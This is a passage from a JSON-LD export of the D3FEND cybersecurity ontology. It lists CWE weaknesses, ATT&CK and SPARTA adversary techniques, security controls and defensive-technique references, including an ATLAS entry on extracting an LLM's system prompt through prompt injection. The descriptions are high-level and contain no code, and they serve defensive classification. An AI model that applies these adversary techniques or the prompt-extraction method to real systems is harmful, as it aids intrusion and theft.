      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "RPC call interception",
      "rdfs:label": "Reference - RPC call interception - Crowdstrike Inc"
    },
    {
      "@id": "d3f:CWE-122",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-122",
      "d3f:definition": "A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().",
      "rdfs:label": "Heap-based Buffer Overflow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-787"
        },
        {
          "@id": "d3f:CWE-788"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1191",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1191",
      "d3f:definition": "The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface.",
      "rdfs:label": "On-Chip Debug and Test Interface With Improper Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1204.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204.005",
      "d3f:definition": "Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. Users may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency.(Citation: Datadog Security Labs Malicious PyPi Packages 2024)(Citation: Fortinet Malicious NPM Packages 2023)",
      "rdfs:label": "Malicious Library",
      "rdfs:subClassOf": {
        "@id": "d3f:T1204"
      }
    },
    {
      "@id": "d3f:CWE-164",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-164",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Internal Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForIdentificationOfSuspiciousSystemProcesses_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170286683A1/en?oq=US-2017286683-A1"
      },
      "d3f:kb-abstract": "A computerized method for identification of suspicious processes executing on an end-point device communicatively connected to network, the network communicatively connected to a server, the method comprising receiving, by the server, a record of at least one process, initiated by and executing on by the end-point device. One or more parameters associated with the at least one process are identified. A first time pointer is identified corresponding to the identified one or more parameters, a first time pointer. A second time pointer at which a user associated with the end-point device initiated a user dependent process is identified. Whether the second time pointer occurred before the first time pointer is identified. It is determined whether the at least one process was initiated by the user based on identification of user dependent processes and corresponding attribution. An action is performed based on the above determination.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "The patent describes detecting malicious processes by identifying the order of process initiation. The start of a user initiated process (user query, opening an application, etc.) is compared with the start of processes initiated by the device (ex. during boot). In addition, a determination is made on whether processes are not initiated by a user by examining process parameters such as type of process, its creator, source, etc. If it is determined that a user initiated process was started before a process initiated by the device and a process was not initiated by the user, the process is marked as suspicious.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "System and methods thereof for identification of suspicious system processes",
      "rdfs:label": "Reference - System and methods thereof for identification of suspicious system processes - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CWE-437",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-437",
      "d3f:definition": "A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint's features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model.",
      "rdfs:label": "Incomplete Model of Endpoint Features",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:Reference-DaggerModelingAndVisualizationForMissionImpactSituationalAwareness",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://ieeexplore.ieee.org/document/7795296"
      },
      "d3f:kb-abstract": "Dagger is a modeling and visualization framework that addresses the challenge of representing knowledge and information for decision-makers, enabling them to better comprehend the operational context of network security data. It allows users to answer critical questions such as “Given that I care about mission X, is there any reason I should be worried about what is going on in cyberspace?” or “If this system fails, will I still be able to accomplish my mission?”.",
      "d3f:kb-author": "Elisha Peterson",
      "d3f:kb-organization": "JHU APL",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Dagger: Modeling and visualization for mission impact situational awareness",
      "rdfs:label": "Reference - Dagger: Modeling and visualization for mission impact situational awareness"
    },
    {
      "@id": "d3f:TA0103",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Evasion - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Evasion"
    },
    {
      "@id": "d3f:CWE-353",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-353",
      "d3f:definition": "The product uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.",
      "rdfs:label": "Missing Support for Integrity Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:PrivilegedUserAccount",
      "@type": "owl:Class",
      "d3f:definition": "A privileged account is a user account that has more privileges than ordinary users. Privileged accounts might, for example, be able to install or remove software, upgrade the operating system, or modify system or application configurations. They might also have access to files that are not normally accessible to standard users. Typical examples are root and administrator accounts. But there are also service accounts, system accounts, etc. Privileged accounts are especially powerful, and should be monitored especially closely.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.ssh.com/iam/user/privileged-account"
      },
      "rdfs:label": "Privileged User Account",
      "rdfs:seeAlso": {
        "@id": "https://www.cyberark.com/resources/blog/7-types-of-privileged-accounts-service-accounts-and-more"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-179",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-179",
      "d3f:definition": "The product validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification.",
      "rdfs:label": "Incorrect Behavior Order: Early Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-20"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-001%3AScheduledTask-FileAccess_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-001/"
      },
      "d3f:kb-abstract": "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\\Windows\\Tasks (legacy) or C:\\Windows\\System32\\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileCreationAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-001: Scheduled Task - FileAccess",
      "rdfs:label": "Reference - CAR-2020-09-001: Scheduled Task - FileAccess - MITRE"
    },
    {
      "@id": "d3f:BinaryClassification",
      "@type": "owl:Class",
      "rdfs:label": "Binary Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classifying"
      }
    },
    {
      "@id": "d3f:CCI-002771_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system validates information output from organization-defined software programs and/or applications to ensure that the information is consistent with the expected content.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OutboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002771"
    },
    {
      "@id": "d3f:AdministrativeNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Administrative network traffic is network traffic related to the remote administration or control of hosts or devices through a standard remote administrative protocol.  Remote shells, terminals, RDP, and VNC are examples of these protocols, which are typically only used by administrators.",
      "rdfs:label": "Administrative Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Remote_administration"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:RD-0005.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.02",
      "d3f:definition": "Non-kinetic physical ASATs damage or degrade without contact, typically via directed energy or intense electromagnetic effects. Ground- or space-based lasers can dazzle or blind optical sensors; high-power microwave or related electromagnetic systems can disrupt or permanently damage susceptible electronics; some concepts aim to generate broader electromagnetic effects. These attacks propagate at light speed, can be tuned for reversible or lasting impact, and may leave limited forensic residue, complicating verification and attribution. Actors who obtain or partner for such systems can pair them with cyber operations (e.g., blind a star tracker while injecting misleading commands) to amplify effect.",
      "rdfs:label": "Non-Kinetic Physical ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Non-Kinetic Physical ASAT"
    },
    {
      "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.sciencedirect.com/science/article/pii/S1742287607000369?viewFullText=true#sec4"
      },
      "d3f:kb-abstract": "“File carving” reconstructs files based on their content, rather than using metadata that points to the content. Carving is widely used for forensics and data recovery, but no file carvers can automatically reassemble fragmented files. We survey files from more than 300 hard drives acquired on the secondary market and show that the ability to reassemble fragmented files is an important requirement for forensic work. Next we analyze the file carving problem, arguing that rapid, accurate carving is best performed by a multi-tier decision problem that seeks to quickly validate or discard candidate byte strings – “objects” – from the media to be carved. Validators for the JPEG, Microsoft OLE (MSOLE) and ZIP file formats are discussed. Finally, we show how high speed validators can be used to reassemble fragmented files.",
      "d3f:kb-author": "Simson L. Garfinkel",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:FileContentDecompressionChecking"
        },
        {
          "@id": "d3f:FileInternalStructureVerification"
        },
        {
          "@id": "d3f:FileMagicByteVerification"
        },
        {
          "@id": "d3f:FileMetadataValueVerification"
        }
      ],
      "d3f:kb-reference-title": "Carving Contiguous and Fragmented Files with Fast Object Validation",
      "rdfs:label": "Reference - Carving Contiguous and Fragmented Files with Fast Object Validation"
    },
    {
      "@id": "d3f:SoftwareTimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "A clock event involving a software-based timekeeping mechanism maintained by an operating system or application.",
      "rdfs:label": "Software Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TimerEvent"
        },
        {
          "@id": "_:N1450ed4905f54ce0b583fb62649332a4"
        }
      ]
    },
    {
      "@id": "_:N1450ed4905f54ce0b583fb62649332a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareTimer"
      }
    },
    {
      "@id": "d3f:T1550.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1550.003",
      "d3f:creates": {
        "@id": "d3f:Authentication"
      },
      "d3f:definition": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.",
      "rdfs:label": "Pass the Ticket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:N74b500fa6b9443be8b7ffbaa2caa468a"
        }
      ]
    },
    {
      "@id": "_:N74b500fa6b9443be8b7ffbaa2caa468a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:AML.T0056",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0056",
      "d3f:definition": "Adversaries may attempt to extract a large language model's (LLM) system prompt. This can be done via prompt injection to induce the model to reveal its own system prompt or may be extracted from a configuration file.\n\nSystem prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.",
      "rdfs:label": "Extract LLM System Prompt - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0056"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Extract LLM System Prompt"
    },
    {
      "@id": "d3f:executed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x executed-by y: The entity or function x is carried out, performed, or run by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:executes"
      },
      "rdfs:label": "executed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:KerberosTicketGrantingTicket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
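      "d3f:definition": "A ticket granting ticket issued by a Kerberos system; that is, a ticket that grants a user domain admin access. A TGT is issued by the Key Distribution Center after initial authentication and is presented to obtain service tickets, so the access it confers is that of the principal it was issued to; it amounts to domain admin access only when that principal holds those privileges.",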
      "rdfs:label": "Kerberos Ticket Granting Ticket",
      "rdfs:seeAlso": {
        "@id": "dbr:Ticket_Granting_Ticket"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KerberosTicket"
        },
        {
          "@id": "d3f:TicketGrantingTicket"
        }
      ]
    },
    {
      "@id": "d3f:T1600.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1600.001",
      "d3f:definition": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)",
      "rdfs:label": "Reduce Key Space",
      "rdfs:subClassOf": {
        "@id": "d3f:T1600"
      }
    },
    {
      "@id": "d3f:CCI-001499_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization limits privileges to change software resident within software libraries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001499"
    },
    {
      "@id": "d3f:CWE-1104",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1104",
      "d3f:definition": "The product relies on third-party components that are not actively supported or maintained by the original developer or a trusted proxy for the original developer.",
      "rdfs:label": "Use of Unmaintained Third Party Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1357"
      }
    },
    {
      "@id": "d3f:StringFormatFunction",
      "@type": "owl:Class",
      "d3f:definition": "A function which creates a new string based on a format specification and corresponding specified values.",
      "rdfs:label": "String Format Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CWE-67",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-67",
      "d3f:definition": "The product constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file.",
      "rdfs:label": "Improper Handling of Windows Device Names",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-66"
      }
    },
    {
      "@id": "d3f:OTProprietaryMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving an OT message that is vendor-specific and may not be publicly documented, or that uses values left for device-specific configuration.",
      "rdfs:label": "OT Proprietary Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N4d7c9e123d58436c974f95318f80afcf"
        }
      ]
    },
    {
      "@id": "_:N4d7c9e123d58436c974f95318f80afcf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProprietaryMessage"
      }
    },
    {
      "@id": "d3f:OTLogicVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A variable which directly affects a program running on an OT controller, involving an OT Process.",
      "rdfs:label": "OT Logic Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:REC-0004.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0004.01",
      "d3f:definition": "Threat actors may attempt to learn how the launch vehicle’s flight termination capability is architected and governed, command-destruct versus autonomous flight termination (AFTS), authority chains, cryptographic protections, arming interlocks, inhibit ladders, telemetry indicators, and range rules for safe-flight criteria. While FTS is a range safety function, its interfaces (command links, keys, timing sources, decision logic) can reveal design patterns, dependencies, and potential misconfigurations across the broader launch ecosystem. Knowledge of test modes, simulation harnesses, and pre-launch checks could inform social-engineering or availability-degrading actions against range or contractor systems during critical windows.",
      "rdfs:label": "Flight Termination - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0004/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0004"
      },
      "skos:prefLabel": "Flight Termination"
    },
    {
      "@id": "d3f:T1557.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1557.004",
      "d3f:definition": "Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)",
      "rdfs:label": "Evil Twin",
      "rdfs:subClassOf": {
        "@id": "d3f:T1557"
      }
    },
    {
      "@id": "d3f:CWE-664",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-664",
      "d3f:definition": "The product does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release.",
      "rdfs:label": "Improper Control of a Resource Through its Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:CWE-606",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-606",
      "d3f:definition": "The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.",
      "rdfs:label": "Unchecked Input for Loop Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1284"
      }
    },
    {
      "@id": "d3f:REC-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002.02",
      "d3f:definition": "Threat actors map the human and institutional terrain surrounding the mission to find leverage for phishing, credential theft, invoice fraud, or supply-chain compromise. Targeted details include the owner/operator, prime and subcontractors (bus, payload, ground, launch), key facilities and labs, cloud/SaaS providers, organizational charts, distribution lists, and role/responsibility boundaries for operations, security, and engineering. The objective is to identify who can approve access, who can move money, who holds admin roles on ground and cloud systems, and which vendors maintain remote access for support. Understanding decision chains also reveals when change control boards meet, when ops handovers occur, and where a single compromised account could bridge enclaves.",
      "rdfs:label": "Organization - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0002"
      },
      "skos:prefLabel": "Organization"
    },
    {
      "@id": "d3f:T1600",
      "@type": "owl:Class",
      "d3f:attack-id": "T1600",
      "d3f:definition": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)",
      "rdfs:label": "Weaken Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-117",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-117",
      "d3f:definition": "The product constructs a log message from external input, but it does not neutralize or incorrectly neutralizes special elements when the message is written to a log file.",
      "d3f:synonym": "Log forging",
      "rdfs:label": "Improper Output Neutralization for Logs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-116"
      }
    },
    {
      "@id": "d3f:T1205",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1205",
      "d3f:definition": "Adversaries use traffic signaling techniques, such as sending specific network sequences or magic packets, to covertly trigger actions like opening ports, activating backdoors, or installing filters, facilitating command and control, persistence, and defense evasion.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Traffic Signaling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N8c6c7f0a941c4e1a8262e0f73017e7f3"
        }
      ]
    },
    {
      "@id": "_:N8c6c7f0a941c4e1a8262e0f73017e7f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-765",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-765",
      "d3f:definition": "The product unlocks a critical resource more times than intended, leading to an unexpected state in the system.",
      "rdfs:label": "Multiple Unlocks of a Critical Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-667"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1116",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1116",
      "d3f:definition": "The source code contains comments that do not accurately describe or explain aspects of the portion of the code with which the comment is associated.",
      "rdfs:label": "Inaccurate Comments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:T1121",
      "@type": "owl:Class",
      "d3f:attack-id": "T1121",
      "d3f:definition": "Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.009",
      "rdfs:label": "Regsvcs/Regasm",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002726_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system verifies the integrity of the boot process of organization-defined devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002726"
    },
    {
      "@id": "d3f:DecoyEnvironment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyEnvironment"
      ],
      "d3f:d3fend-id": "D3-DE",
      "d3f:definition": "A Decoy Environment comprises hosts and networks for the purposes of deceiving an attacker.",
      "d3f:enables": {
        "@id": "d3f:Deceive"
      },
      "d3f:kb-article": "## Technique Overview\n\nSystems in a decoy environment are typically configured so that some detectable means of communication does not have any legitimate business purpose.  Any communication via these means should be logged and analyzed to find potential indicators of compromise for a possible past or future attack against other systems.",
      "d3f:manages": {
        "@id": "d3f:DecoyArtifact"
      },
      "d3f:synonym": "Honeypot",
      "rdfs:label": "Decoy Environment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N0c55f8f6e2c546e19037e85fc7ca6138"
        },
        {
          "@id": "_:N5665f3ecb7a9417abe0875fd5f99d2b5"
        }
      ]
    },
    {
      "@id": "_:N0c55f8f6e2c546e19037e85fc7ca6138",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Deceive"
      }
    },
    {
      "@id": "_:N5665f3ecb7a9417abe0875fd5f99d2b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DecoyArtifact"
      }
    },
    {
      "@id": "d3f:T1594",
      "@type": "owl:Class",
      "d3f:attack-id": "T1594",
      "d3f:definition": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)",
      "rdfs:label": "Search Victim-Owned Websites",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:LinuxFork",
      "@type": "owl:Class",
      "d3f:definition": "Creates a child process with unique PID but retains parent PID as Parent Process Identifier (PPID).",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/fork.2.html"
      },
      "rdfs:label": "Linux Fork",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-1269",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1269",
      "d3f:definition": "The product released to market is released in pre-production or manufacturing configuration.",
      "rdfs:label": "Product Released in Non-Release Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-191",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-191",
      "d3f:definition": "The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.",
      "d3f:synonym": "Integer underflow",
      "rdfs:label": "Integer Underflow (Wrap or Wraparound)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Embedded Data Types",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(5)"
    },
    {
      "@id": "d3f:CWE-704",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-704",
      "d3f:definition": "The product does not correctly convert an object, resource, or structure from one type to a different type.",
      "rdfs:label": "Incorrect Type Conversion or Cast",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-497",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-497",
      "d3f:definition": "The product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does.",
      "rdfs:label": "Exposure of Sensitive System Information to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1518.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1518.001",
      "d3f:definition": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-access": [
        {
          "@id": "d3f:FileSystemMetadata"
        },
        {
          "@id": "d3f:KernelProcessTable"
        },
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "d3f:SystemFirewallConfiguration"
        }
      ],
      "d3f:may-invoke": {
        "@id": "d3f:GetRunningProcesses"
      },
      "rdfs:label": "Security Software Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1518"
        },
        {
          "@id": "_:N3322fdf74338446fb651526c82f890e8"
        },
        {
          "@id": "_:Nafad5fdacef649729163b64d7e291063"
        },
        {
          "@id": "_:Nd595d42c34494332ae6c4acbcff10a76"
        },
        {
          "@id": "_:N39e6b4c61fc843d0a9a61d5ede7890f3"
        },
        {
          "@id": "_:N84f8dbcaca604024ae3b8ef4e7fa6b8f"
        }
      ]
    },
    {
      "@id": "_:N3322fdf74338446fb651526c82f890e8",
      "@type": "owl:Restriction",
